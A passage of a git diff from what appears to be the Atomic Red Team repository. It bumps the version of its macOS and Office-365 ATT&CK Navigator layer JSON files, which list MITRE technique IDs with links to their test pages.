nabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index ca1d359c..c35e563a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 2dc3ea92..af1e579f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
